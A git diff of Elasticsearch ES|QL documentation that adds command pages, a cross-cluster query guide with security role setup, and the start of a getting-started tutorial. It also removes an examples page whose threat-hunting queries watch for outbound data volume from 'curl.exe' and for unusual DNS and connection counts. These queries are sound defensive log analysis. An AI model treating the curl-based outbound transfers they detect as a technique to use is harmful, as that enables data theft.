0000000000000..130abec311750 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/show.md @@ -0,0 +1,10 @@ +--- +navigation_title: "SHOW" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-show +--- + +# `SHOW` [esql-show] + +:::{include} ../_snippets/commands/layout/show.md +::: diff --git a/docs/reference/query-languages/esql/commands/sort.md b/docs/reference/query-languages/esql/commands/sort.md new file mode 100644 index 0000000000000..ada8a69b93bfd --- /dev/null +++ b/docs/reference/query-languages/esql/commands/sort.md @@ -0,0 +1,10 @@ +--- +navigation_title: "SORT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-sort +--- + +# `SORT` [esql-sort] + +:::{include} ../_snippets/commands/layout/sort.md +::: diff --git a/docs/reference/query-languages/esql/commands/source-commands.md b/docs/reference/query-languages/esql/commands/source-commands.md index 8717ea15ddd95..1dc8a6dc4c466 100644 --- a/docs/reference/query-languages/esql/commands/source-commands.md +++ b/docs/reference/query-languages/esql/commands/source-commands.md @@ -1,4 +1,7 @@ --- +applies_to: + stack: + serverless: navigation_title: "Source commands" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html @@ -17,12 +20,3 @@ An {{esql}} source command produces a table, typically with data from {{es}}. An :::{include} ../_snippets/lists/source-commands.md ::: -:::{include} ../_snippets/commands/layout/from.md -::: - -:::{include} ../_snippets/commands/layout/row.md -::: - -:::{include} ../_snippets/commands/layout/show.md -::: - diff --git a/docs/reference/query-languages/esql/commands/stats-by.md b/docs/reference/query-languages/esql/commands/stats-by.md new file mode 100644 index 0000000000000..c4b7892cfa5a7 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/stats-by.md @@ -0,0 +1,10 @@ +--- +navigation_title: "STATS" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-stats-by +--- + +# `STATS` [esql-stats-by] + +:::{include} ../_snippets/commands/layout/stats-by.md +::: diff --git a/docs/reference/query-languages/esql/commands/where.md b/docs/reference/query-languages/esql/commands/where.md new file mode 100644 index 0000000000000..28d0b999f2df5 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/where.md @@ -0,0 +1,10 @@ +--- +navigation_title: "WHERE" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-where +--- + +# `WHERE` [esql-where] + +:::{include} ../_snippets/commands/layout/where.md +::: diff --git a/docs/reference/query-languages/esql/esql-commands.md b/docs/reference/query-languages/esql/esql-commands.md index 9c5ec270ecd2a..d50de09122b72 100644 --- a/docs/reference/query-languages/esql/esql-commands.md +++ b/docs/reference/query-languages/esql/esql-commands.md @@ -1,4 +1,7 @@ --- +applies_to: + stack: + serverless: navigation_title: "Commands" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html @@ -6,28 +9,7 @@ mapped_pages: # {{esql}} commands [esql-commands] -## Source commands [esql-source-commands] +{{esql}} commands come in two flavors: source commands and processing commands: -An {{esql}} source command produces a table, typically with data from {{es}}. An {{esql}} query must start with a source command. - -:::{image} ../images/source-command.svg -:alt: A source command producing a table from {{es}} -::: - -{{esql}} supports these source commands: - -:::{include} _snippets/lists/source-commands.md -::: - -## Processing commands [esql-processing-commands] - -{{esql}} processing commands change an input table by adding, removing, or changing rows and columns. - -:::{image} ../images/processing-command.svg -:alt: A processing command changing an input table -::: - -{{esql}} supports these processing commands: - -:::{include} _snippets/lists/processing-commands.md -::: +- An {{esql}} query must start with a [source command](./commands/source-commands.md). +- Use [processing commands](./commands/processing-commands.md) to modify an input table by adding, removing, or transforming rows and columns. \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-cross-clusters.md b/docs/reference/query-languages/esql/esql-cross-clusters.md new file mode 100644 index 0000000000000..762c6b2ab6ae9 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-cross-clusters.md @@ -0,0 +1,507 @@ +--- +navigation_title: Query across clusters +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-cross-clusters.html +applies_to: + stack: preview 9.0, ga 9.1 + serverless: unavailable +products: + - id: elasticsearch +--- + + +# Use ES|QL across clusters [esql-cross-clusters] + +With {{esql}}, you can execute a single query across multiple clusters. + + +## Prerequisites [esql-ccs-prerequisites] + +* {{ccs-cap}} requires remote clusters. To set up remote clusters, see [*Remote clusters*](docs-content://deploy-manage/remote-clusters.md). + + To ensure your remote cluster configuration supports {{ccs}}, see [Supported {{ccs}} configurations](docs-content://solutions/search/cross-cluster-search.md#ccs-supported-configurations). + +* For full {{ccs}} capabilities, the local and remote cluster must be on the same [subscription level](https://www.elastic.co/subscriptions). +* The local coordinating node must have the [`remote_cluster_client`](docs-content://deploy-manage/distributed-architecture/clusters-nodes-shards/node-roles.md#remote-node) node role. +* If you use [sniff mode](docs-content:///deploy-manage/remote-clusters/remote-clusters-self-managed.md#sniff-mode), the local coordinating node must be able to connect to seed and gateway nodes on the remote cluster. + + We recommend using gateway nodes capable of serving as coordinating nodes. The seed nodes can be a subset of these gateway nodes. + +* If you use [proxy mode](docs-content:///deploy-manage/remote-clusters/remote-clusters-self-managed.md#proxy-mode), the local coordinating node must be able to connect to the configured `proxy_address`. The proxy at this address must be able to route connections to gateway and coordinating nodes on the remote cluster. +* {{ccs-cap}} requires different security privileges on the local cluster and remote cluster. See [Configure privileges for {{ccs}}](docs-content://deploy-manage/remote-clusters/remote-clusters-cert.md#remote-clusters-privileges-ccs) and [*Remote clusters*](docs-content://deploy-manage/remote-clusters.md). + + +## Security model [esql-ccs-security-model] + +{{es}} supports two security models for cross-cluster search (CCS): + +* [TLS certificate authentication](#esql-ccs-security-model-certificate) +* [API key authentication](#esql-ccs-security-model-api-key) + +::::{tip} +To check which security model is being used to connect your clusters, run `GET _remote/info`. If you’re using the API key authentication method, you’ll see the `"cluster_credentials"` key in the response. + +:::: + + + +### TLS certificate authentication [esql-ccs-security-model-certificate] + +::::{admonition} Deprecated in 9.0.0. +:class: warning + +Use [API key authentication](#esql-ccs-security-model-api-key) instead. +:::: + + +TLS certificate authentication secures remote clusters with mutual TLS. This could be the preferred model when a single administrator has full control over both clusters. We generally recommend that roles and their privileges be identical in both clusters. + +Refer to [TLS certificate authentication](docs-content://deploy-manage/remote-clusters/remote-clusters-cert.md) for prerequisites and detailed setup instructions. + + +### API key authentication [esql-ccs-security-model-api-key] + +The following information pertains to using {{esql}} across clusters with the [**API key based security model**](docs-content://deploy-manage/remote-clusters/remote-clusters-api-key.md). You’ll need to follow the steps on that page for the **full setup instructions**. This page only contains additional information specific to {{esql}}. + +API key based cross-cluster search (CCS) enables more granular control over allowed actions between clusters. This may be the preferred model when you have different administrators for different clusters and want more control over who can access what data. In this model, cluster administrators must explicitly define the access given to clusters and users. + +You will need to: + +* Create an API key on the **remote cluster** using the [Create cross-cluster API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key) API or using the [Kibana API keys UI](docs-content://deploy-manage/api-keys/elasticsearch-api-keys.md). +* Add the API key to the keystore on the **local cluster**, as part of the steps in [configuring the local cluster](docs-content://deploy-manage/remote-clusters/remote-clusters-api-key.md#remote-clusters-security-api-key-local-actions). All cross-cluster requests from the local cluster are bound by the API key’s privileges. + +Using {{esql}} with the API key based security model requires some additional permissions that may not be needed when using the traditional query DSL based search. The following example API call creates a role that can query remote indices using {{esql}} when using the API key based security model. The final privilege, `remote_cluster`, is required to allow remote enrich operations. + +```console +POST /_security/role/remote1 +{ + "cluster": ["cross_cluster_search"], <1> + "indices": [ + { + "names" : [""], <2> + "privileges": ["read"] + } + ], + "remote_indices": [ <3> + { + "names": [ "logs-*" ], + "privileges": [ "read","read_cross_cluster" ], <4> + "clusters" : ["my_remote_cluster"] <5> + } + ], + "remote_cluster": [ <6> + { + "privileges": [ + "monitor_enrich" + ], + "clusters": [ + "my_remote_cluster" + ] + } + ] +} +``` + +1. The `cross_cluster_search` cluster privilege is required for the *local* cluster. +2. Typically, users will have permissions to read both local and remote indices. However, for cases where the role is intended to ONLY search the remote cluster, the `read` permission is still required for the local cluster. To provide read access to the local cluster, but disallow reading any indices in the local cluster, the `names` field may be an empty string. +3. The indices allowed read access to the remote cluster. The configured [cross-cluster API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key) must also allow this index to be read. +4. The `read_cross_cluster` privilege is always required when using {{esql}} across clusters with the API key based security model. +5. The remote clusters to which these privileges apply. This remote cluster must be configured with a [cross-cluster API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key) and connected to the remote cluster before the remote index can be queried. Verify connection using the [Remote cluster info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-remote-info) API. +6. Required to allow remote enrichment. Without this, the user cannot read from the `.enrich` indices on the remote cluster. The `remote_cluster` security privilege was introduced in version **8.15.0**. + + +You will then need a user or API key with the permissions you created above. The following example API call creates a user with the `remote1` role. + +```console +POST /_security/user/remote_user +{ + "password" : "", + "roles" : [ "remote1" ] +} +``` + +Remember that all cross-cluster requests from the local cluster are bound by the cross cluster API key’s privileges, which are controlled by the remote cluster’s administrator. + +::::{tip} +Cross cluster API keys created in versions prior to 8.15.0 will need to replaced or updated to add the new permissions required for {{esql}} with ENRICH. + +:::: + + + +## Remote cluster setup [ccq-remote-cluster-setup] + +Once the security model is configured, you can add remote clusters. + +The following [cluster update settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings) API request adds three remote clusters: `cluster_one`, `cluster_two`, and `cluster_three`. + +```console +PUT _cluster/settings +{ + "persistent": { + "cluster": { + "remote": { + "cluster_one": { + "seeds": [ + "35.238.149.1:9300" + ], + "skip_unavailable": true + }, + "cluster_two": { + "seeds": [ + "35.238.149.2:9300" + ], + "skip_unavailable": false + }, + "cluster_three": { <1> + "seeds": [ + "35.238.149.3:9300" + ] + } + } + } + } +} +``` + +1. Since `skip_unavailable` was not set on `cluster_three`, it uses the default of `true`. See the [Optional remote clusters](#ccq-skip-unavailable-clusters) section for details. + + + +## Query across multiple clusters [ccq-from] + +In the `FROM` command, specify data streams and indices on remote clusters using the format `:`. For instance, the following {{esql}} request queries the `my-index-000001` index on a single remote cluster named `cluster_one`: + +```esql +FROM cluster_one:my-index-000001 +| LIMIT 10 +``` + +Similarly, this {{esql}} request queries the `my-index-000001` index from three clusters: + +* The local ("querying") cluster +* Two remote clusters, `cluster_one` and `cluster_two` + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| LIMIT 10 +``` + +Likewise, this {{esql}} request queries the `my-index-000001` index from all remote clusters (`cluster_one`, `cluster_two`, and `cluster_three`): + +```esql +FROM *:my-index-000001 +| LIMIT 10 +``` + + +## Cross-cluster metadata [ccq-cluster-details] + +Using the `"include_ccs_metadata": true` option, users can request that ES|QL {{ccs}} responses include metadata about the search on each cluster (when the response format is JSON). Here we show an example using the async search endpoint. {{ccs-cap}} metadata is also present in the synchronous search endpoint response when requested. If the search returns partial results and there are partial shard or remote cluster failures, `_clusters` metadata containing the failures will be included in the response regardless of the `include_ccs_metadata` parameter. + +```console +POST /_query/async?format=json +{ + "query": """ + FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index* + | STATS COUNT(http.response.status_code) BY user.id + | LIMIT 2 + """, + "include_ccs_metadata": true +} +``` + +Which returns: + +```console-result +{ + "is_running": false, + "took": 42, <1> + "is_partial": false, <7> + "columns" : [ + { + "name" : "COUNT(http.response.status_code)", + "type" : "long" + }, + { + "name" : "user.id", + "type" : "keyword" + } + ], + "values" : [ + [4, "elkbee"], + [1, "kimchy"] + ], + "_clusters": { <2> + "total": 3, + "successful": 3, + "running": 0, + "skipped": 0, + "partial": 0, + "failed": 0, + "details": { <3> + "(local)": { <4> + "status": "successful", + "indices": "blogs", + "took": 41, <5> + "_shards": { <6> + "total": 13, + "successful": 13, + "skipped": 0, + "failed": 0 + } + }, + "cluster_one": { + "status": "successful", + "indices": "cluster_one:my-index-000001", + "took": 38, + "_shards": { + "total": 4, + "successful": 4, + "skipped": 0, + "failed": 0 + } + }, + "cluster_two": { + "status": "successful", + "indices": "cluster_two:my-index*", + "took": 40, + "_shards": { + "total": 18, + "successful": 18, + "skipped": 1, + "failed": 0 + } + } + } + } +} +``` + +1. How long the entire search (across all clusters) took, in milliseconds. +2. This section of counters shows all possible cluster search states and how many cluster searches are currently in that state. The clusters can have one of the following statuses: **running**, **successful** (searches on all shards were successful), **skipped** (the search failed on a cluster marked with `skip_unavailable`=`true`), **failed** (the search failed on a cluster marked with `skip_unavailable`=`false`) or **partial** (the search was [interrupted](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql) before finishing or has partially failed). +3. The `_clusters/details` section shows metadata about the search on each cluster. +4. If you included indices from the local cluster you sent the request to in your {{ccs}}, it is identified as "(local)". +5. How long (in milliseconds) the search took on each cluster. This can be useful to determine which clusters have slower response times than others. +6. The shard details for the search on that cluster, including a count of shards that were skipped due to the can-match phase results. Shards are skipped when they cannot have any matching data and therefore are not included in the full ES|QL query. +7. The `is_partial` field is set to `true` if the search has partial results for any reason, for example due to partial shard failures, +failures in remote clusters, or if the async query was stopped by calling the [async query stop API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql). + +The cross-cluster metadata can be used to determine whether any data came back from a cluster. For instance, in the query below, the wildcard expression for `cluster-two` did not resolve to a concrete index (or indices). The cluster is, therefore, marked as *skipped* and the total number of shards searched is set to zero. + +```console +POST /_query/async?format=json +{ + "query": """ + FROM cluster_one:my-index*,cluster_two:logs* + | STATS COUNT(http.response.status_code) BY user.id + | LIMIT 2 + """, + "include_ccs_metadata": true +} +``` + +Which returns: + +```console-result +{ + "is_running": false, + "took": 55, + "is_partial": true, <3> + "columns": [ + ... + ], + "values": [ + ... + ], + "_clusters": { + "total": 2, + "successful": 1, + "running": 0, + "skipped": 1, <1> + "partial": 0, + "failed": 0, + "details": { + "cluster_one": { + "status": "successful", + "indices": "cluster_one:my-index*", + "took": 38, + "_shards": { + "total": 4, + "successful": 4, + "skipped": 0, + "failed": 0 + } + }, + "cluster_two": { + "status": "skipped", <1> + "indices": "cluster_two:logs*", + "took": 0, + "_shards": { + "total": 0, <2> + "successful": 0, + "skipped": 0, + "failed": 0 + } + } + } + } +} +``` + +1. This cluster is marked as *skipped*, since there were no matching indices on that cluster. +2. Indicates that no shards were searched (due to not having any matching indices). +3. Since one of the clusters is skipped, the search result is marked as partial. + + + +## Enrich across clusters [ccq-enrich] + +Enrich in {{esql}} across clusters operates similarly to [local enrich](commands/enrich.md). If the enrich policy and its enrich indices are consistent across all clusters, simply write the enrich command as you would without remote clusters. In this default mode, {{esql}} can execute the enrich command on either the local cluster or the remote clusters, aiming to minimize computation or inter-cluster data transfer. Ensuring that the policy exists with consistent data on both the local cluster and the remote clusters is critical for ES|QL to produce a consistent query result. + +::::{tip} +Enrich in {{esql}} across clusters using the API key based security model was introduced in version **8.15.0**. Cross cluster API keys created in versions prior to 8.15.0 will need to replaced or updated to use the new required permissions. Refer to the example in the [API key authentication](#esql-ccs-security-model-api-key) section. + +:::: + + +In the following example, the enrich with `hosts` policy can be executed on either the local cluster or the remote cluster `cluster_one`. + +```esql +FROM my-index-000001,cluster_one:my-index-000001 +| ENRICH hosts ON ip +| LIMIT 10 +``` + +Enrich with an {{esql}} query against remote clusters only can also happen on the local cluster. This means the below query requires the `hosts` enrich policy to exist on the local cluster as well. + +```esql +FROM cluster_one:my-index-000001,cluster_two:my-index-000001 +| LIMIT 10 +| ENRICH hosts ON ip +``` + + +### Enrich with coordinator mode [esql-enrich-coordinator] + +{{esql}} provides the enrich `_coordinator` mode to force {{esql}} to execute the enrich command on the local cluster. This mode should be used when the enrich policy is not available on the remote clusters or maintaining consistency of enrich indices across clusters is challenging. + +```esql +FROM my-index-000001,cluster_one:my-index-000001 +| ENRICH _coordinator:hosts ON ip +| SORT host_name +| LIMIT 10 +``` + +::::{important} +Enrich with the `_coordinator` mode usually increases inter-cluster data transfer and workload on the local cluster. + +:::: + + + +### Enrich with remote mode [esql-enrich-remote] + +{{esql}} also provides the enrich `_remote` mode to force {{esql}} to execute the enrich command independently on each remote cluster where the target indices reside. This mode is useful for managing different enrich data on each cluster, such as detailed information of hosts for each region where the target (main) indices contain log events from these hosts. + +In the below example, the `hosts` enrich policy is required to exist on all remote clusters: the `querying` cluster (as local indices are included), the remote cluster `cluster_one`, and `cluster_two`. + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| ENRICH _remote:hosts ON ip +| SORT host_name +| LIMIT 10 +``` + +A `_remote` enrich cannot be executed after a [`STATS`](commands/stats-by.md) command. The following example would result in an error: + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| STATS COUNT(*) BY ip +| ENRICH _remote:hosts ON ip +| SORT host_name +| LIMIT 10 +``` + + +### Multiple enrich commands [esql-multi-enrich] + +You can include multiple enrich commands in the same query with different modes. {{esql}} will attempt to execute them accordingly. For example, this query performs two enriches, first with the `hosts` policy on any cluster and then with the `vendors` policy on the local cluster. + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| ENRICH hosts ON ip +| ENRICH _coordinator:vendors ON os +| LIMIT 10 +``` + +A `_remote` enrich command can’t be executed after a `_coordinator` enrich command. The following example would result in an error. + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| ENRICH _coordinator:hosts ON ip +| ENRICH _remote:vendors ON os +| LIMIT 10 +``` + + +## Excluding clusters or indices from {{esql}} query [ccq-exclude] + +To exclude an entire cluster, prefix the cluster alias with a minus sign in the `FROM` command, for example: `-my_cluster:*`: + +```esql +FROM my-index-000001,cluster*:my-index-000001,-cluster_three:* +| LIMIT 10 +``` + +To exclude a specific remote index, prefix the index with a minus sign in the `FROM` command, such as `my_cluster:-my_index`: + +```esql +FROM my-index-000001,cluster*:my-index-*,cluster_three:-my-index-000001 +| LIMIT 10 +``` + + +## Skipping problematic remote clusters [ccq-skip-unavailable-clusters] + +{{ccs-cap}} for {{esql}} behavior when there are problems connecting to or running query on remote clusters differs between versions. + +::::{tab-set} + +:::{tab-item} 9.1 +Remote clusters are configured with the `skip_unavailable: true` setting by default. With this setting, clusters are marked as `skipped` or `partial` rather than causing queries to fail in the following scenarios: + +* The remote cluster is disconnected from the querying cluster, either before or during the query execution. +* The remote cluster does not have the requested index, or it is not accessible due to security settings. +* An error happened while processing the query on the remote cluster. + +The `partial` status means the remote query either has errors or was interrupted by an explicit user action, but some data may be returned. + +Queries will still fail when `skip_unavailable` is set `true`, if none of the specified indices exist. For example, the +following queries will fail: + +```esql +FROM cluster_one:missing-index | LIMIT 10 +FROM cluster_one:missing-index* | LIMIT 10 +FROM cluster_one:missing-index*,cluster_two:missing-index | LIMIT 10 +``` +::: + +:::{tab-item} 9.0 +If a remote cluster disconnects from the querying cluster, {{ccs}} for {{esql}} will set it to `skipped` +and continue the query with other clusters, unless the remote cluster's `skip_unavailable` setting is set to `false`, +in which case the query will fail. +::: + +:::: + +## Query across clusters during an upgrade [ccq-during-upgrade] + +You can still search a remote cluster while performing a rolling upgrade on the local cluster. However, the local coordinating node’s "upgrade from" and "upgrade to" version must be compatible with the remote cluster’s gateway node. + +::::{warning} +Running multiple versions of {{es}} in the same cluster beyond the duration of an upgrade is not supported. +:::: + + +For more information about upgrades, see [Upgrading {{es}}](docs-content://deploy-manage/upgrade/deployment-or-cluster.md). diff --git a/docs/reference/query-languages/esql/esql-enrich-data.md b/docs/reference/query-languages/esql/esql-enrich-data.md index ac225622700fa..d841dfcb14a4c 100644 --- a/docs/reference/query-languages/esql/esql-enrich-data.md +++ b/docs/reference/query-languages/esql/esql-enrich-data.md @@ -6,7 +6,7 @@ mapped_pages: # Combine data from multiple indices with `ENRICH` [esql-enrich-data] -The {{esql}} [`ENRICH`](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) processing command combines, at query-time, data from one or more source indexes with field-value combinations found in {{es}} enrich indexes. +The {{esql}} [`ENRICH`](/reference/query-languages/esql/commands/enrich.md) processing command combines, at query-time, data from one or more source indexes with field-value combinations found in {{es}} enrich indexes. For example, you can use `ENRICH` to: @@ -14,7 +14,7 @@ For example, you can use `ENRICH` to: * Add product information to retail orders based on product IDs * Supplement contact information based on an email address -[`ENRICH`](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) is similar to [`LOOKUP join`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) in the fact that they both help you join data together. You should use `ENRICH` when: +[`ENRICH`](/reference/query-languages/esql/commands/enrich.md) is similar to [`LOOKUP join`](/reference/query-languages/esql/commands/lookup-join.md) in the fact that they both help you join data together. You should use `ENRICH` when: * Enrichment data doesn't change frequently * You can accept index-time overhead @@ -125,7 +125,7 @@ Once the enrich policy is created, you need to execute it using the [execute enr The *enrich index* contains documents from the policy’s source indices. Enrich indices always begin with `.enrich-*`, are read-only, and are [force merged](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge). ::::{warning} -Enrich indices should only be used by the [enrich processor](/reference/enrich-processor/enrich-processor.md) or the [{{esql}} `ENRICH` command](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich). Avoid using enrich indices for other purposes. +Enrich indices should only be used by the [enrich processor](/reference/enrich-processor/enrich-processor.md) or the [{{esql}} `ENRICH` command](/reference/query-languages/esql/commands/enrich.md). Avoid using enrich indices for other purposes. :::: @@ -133,7 +133,7 @@ Enrich indices should only be used by the [enrich processor](/reference/enrich-p ### Use the enrich policy [esql-use-enrich] -After the policy has been executed, you can use the [`ENRICH` command](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) to enrich your data. +After the policy has been executed, you can use the [`ENRICH` command](/reference/query-languages/esql/commands/enrich.md) to enrich your data. :::{image} ../images/esql-enrich-command.png :alt: esql enrich command diff --git a/docs/reference/query-languages/esql/esql-examples.md b/docs/reference/query-languages/esql/esql-examples.md index 6f5fccde5d15b..ebcac3c1d5c5f 100644 --- a/docs/reference/query-languages/esql/esql-examples.md +++ b/docs/reference/query-languages/esql/esql-examples.md @@ -1,91 +1,11 @@ --- -navigation_title: "Examples" +navigation_title: "Tutorials" --- -# {{esql}} examples [esql-examples] +# {{esql}} tutorials [esql-examples] -## Aggregating and enriching windows event logs +Use these hands-on tutorials to explore practical use cases with {{esql}}: -```esql -FROM logs-* -| WHERE event.code IS NOT NULL -| STATS event_code_count = COUNT(event.code) BY event.code,host.name -| ENRICH win_events ON event.code WITH event_description -| WHERE event_description IS NOT NULL and host.name IS NOT NULL -| RENAME event_description AS event.description -| SORT event_code_count DESC -| KEEP event_code_count,event.code,host.name,event.description -``` - -* It starts by querying logs from indices that match the pattern "logs-*". -* Filters events where the "event.code" field is not null. -* Aggregates the count of events by "event.code" and "host.name." -* Enriches the events with additional information using the "EVENT_DESCRIPTION" field. -* Filters out events where "EVENT_DESCRIPTION" or "host.name" is null. -* Renames "EVENT_DESCRIPTION" as "event.description." -* Sorts the result by "event_code_count" in descending order. -* Keeps only selected fields: "event_code_count," "event.code," "host.name," and "event.description." - - -## Summing outbound traffic from a process `curl.exe` - -```esql -FROM logs-endpoint -| WHERE process.name == "curl.exe" -| STATS bytes = SUM(destination.bytes) BY destination.address -| EVAL kb = bytes/1024 -| SORT kb DESC -| LIMIT 10 -| KEEP kb,destination.address -``` - -* Queries logs from the "logs-endpoint" source. -* Filters events where the "process.name" field is "curl.exe." -* Calculates the sum of bytes sent to destination addresses and converts it to kilobytes (KB). -* Sorts the results by "kb" (kilobytes) in descending order. -* Limits the output to the top 10 results. -* Keeps only the "kb" and "destination.address" fields. - - - -## Manipulating DNS logs to find a high number of unique dns queries per registered domain - -```esql -FROM logs-* -| GROK dns.question.name "%{DATA}\\.%{GREEDYDATA:dns.question.registered_domain:string}" -| STATS unique_queries = COUNT_DISTINCT(dns.question.name) BY dns.question.registered_domain, process.name -| WHERE unique_queries > 10 -| SORT unique_queries DESC -| RENAME unique_queries AS `Unique Queries`, dns.question.registered_domain AS `Registered Domain`, process.name AS `Process` -``` - -* Queries logs from indices matching "logs-*." -* Uses the "grok" pattern to extract the registered domain from the "dns.question.name" field. -* Calculates the count of unique DNS queries per registered domain and process name. -* Filters results where "unique_queries" are greater than 10. -* Sorts the results by "unique_queries" in descending order. -* Renames fields for clarity: "unique_queries" to "Unique Queries," "dns.question.registered_domain" to "Registered Domain," and "process.name" to "Process." - - - -## Identifying high-numbers of outbound user connections - -```esql -FROM logs-* -| WHERE NOT CIDR_MATCH(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16") -| STATS destcount = COUNT(destination.ip) BY user.name, host.name -| ENRICH ldap_lookup_new ON user.name -| WHERE group.name IS NOT NULL -| EVAL follow_up = CASE(destcount >= 100, "true","false") -| SORT destcount DESC -| KEEP destcount, host.name, user.name, group.name, follow_up -``` - -* Queries logs from indices matching "logs-*." -* Filters out events where the destination IP address falls within private IP address ranges (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). -* Calculates the count of unique destination IPs by "user.name" and "host.name." -* Enriches the "user.name" field with LDAP group information. -* Filters out results where "group.name" is not null. -* Uses a "CASE" statement to create a "follow_up" field, setting it to "true" when "destcount" is greater than or equal to 100 and "false" otherwise. -* Sorts the results by "destcount" in descending order. -* Keeps selected fields: "destcount," "host.name," "user.name," "group.name," and "follow_up." +- [](esql-getting-started.md): Learn the basic syntax of the language. +- [Search and filter with {{esql}}](esql-search-tutorial.md): Learn how to use {{esql}} to search and filter data. +- [Threat hunting with {{esql}}](docs-content://solutions/security/esql-for-security/esql-threat-hunting-tutorial.md): Learn how to use {{esql}} for advanced threat hunting techniques and security analysis. \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-getting-started.md b/docs/reference/query-languages/esql/esql-getting-started.md new file mode 100644 index 0000000000000..a24baaea4b3e6 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-getting-started.md @@ -0,0 +1,424 @@ +--- +applies_to: + stack: ga + serverless: ga +navigation_title: Get started +--- + +# Get started with {{esql}} queries [esql-getting-started] + +This hands-on guide covers the basics of using {{esql}} to query and aggregate your data. + +::::{tip} +This getting started is also available as an [interactive Python notebook](https://github.com/elastic/elasticsearch-labs/blob/main/notebooks/esql/esql-getting-started.ipynb) in the `elasticsearch-labs` GitHub repository. +:::: + +## Prerequisites [esql-getting-started-prerequisites] + +To follow along with the queries in this guide, you can either set up your own deployment, or use Elastic’s public {{esql}} demo environment. + +:::::::{tab-set} + +::::::{tab-item} Own deployment +First ingest some sample data. In {{kib}}, open the main menu and select **Dev Tools**. Run the following two requests: + +```console +PUT sample_data +{ + "mappings": { + "properties": { + "client_ip": { + "type": "ip" + }, + "message": { + "type": "keyword" + } + } + } +} + +PUT sample_data/_bulk +{"index": {}} +{"@timestamp": "2023-10-23T12:15:03.360Z", "client_ip": "172.21.2.162", "message": "Connected to 10.1.0.3", "event_duration": 3450233} +{"index": {}} +{"@timestamp": "2023-10-23T12:27:28.948Z", "client_ip": "172.21.2.113", "message": "Connected to 10.1.0.2", "event_duration": 2764889} +{"index": {}} +{"@timestamp": "2023-10-23T13:33:34.937Z", "client_ip": "172.21.0.5", "message": "Disconnected", "event_duration": 1232382} +{"index": {}} +{"@timestamp": "2023-10-23T13:51:54.732Z", "client_ip": "172.21.3.15", "message": "Connection error", "event_duration": 725448} +{"index": {}} +{"@timestamp": "2023-10-23T13:52:55.015Z", "client_ip": "172.21.3.15", "message": "Connection error", "event_duration": 8268153} +{"index": {}} +{"@timestamp": "2023-10-23T13:53:55.832Z", "client_ip": "172.21.3.15", "message": "Connection error", "event_duration": 5033755} +{"index": {}} +{"@timestamp": "2023-10-23T13:55:01.543Z", "client_ip": "172.21.3.15", "message": "Connected to 10.1.0.1", "event_duration": 1756467} +``` +:::::: + +::::::{tab-item} Demo environment +The data set used in this guide has been preloaded into the Elastic {{esql}} public demo environment. Visit [ela.st/ql](https://ela.st/ql) to start using it. +:::::: + +::::::: + +## Run an {{esql}} query [esql-getting-started-running-queries] + +In {{kib}}, you can use Console or Discover to run {{esql}} queries: + +:::::::{tab-set} + +::::::{tab-item} Console +To get started with {{esql}} in Console, open the main menu and select **Dev Tools**. + +The general structure of an [{{esql}} query API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql) request is: + +```txt +POST /_query?format=txt +{ + "query": """ + + """ +} +``` + +Enter the actual {{esql}} query between the two sets of triple quotes. For example: + +```txt +POST /_query?format=txt +{ + "query": """ +FROM kibana_sample_data_logs + """ +} +``` + +:::::: + +::::::{tab-item} Discover +To get started with {{esql}} in Discover, open the main menu and select **Discover**. Next, select **Try ES|QL** from the application menu bar. + +Adjust the time filter so it includes the timestamps in the sample data (October 23rd, 2023). + +After switching to {{esql}} mode, the query bar shows a sample query. You can replace this query with the queries in this getting started guide. + +You can adjust the editor’s height by dragging its bottom border to your liking. +:::::: + +::::::: + +## Your first {{esql}} query [esql-getting-started-first-query] + +Each {{esql}} query starts with a [source command](commands/source-commands.md). A source command produces a table, typically with data from {{es}}. + +:::{image} ../images/elasticsearch-reference-source-command.svg +:alt: A source command producing a table from {{es}} +::: + +The [`FROM`](commands/from.md) source command returns a table with documents from a data stream, index, or alias. Each row in the resulting table represents a document. This query returns up to 1000 documents from the `sample_data` index: + +```esql +FROM sample_data +``` + +Each column corresponds to a field, and can be accessed by the name of that field. + +::::{tip} +{{esql}} keywords are case-insensitive. The following query is identical to the previous one: + +```esql +from sample_data +``` + +:::: + + + +## Processing commands 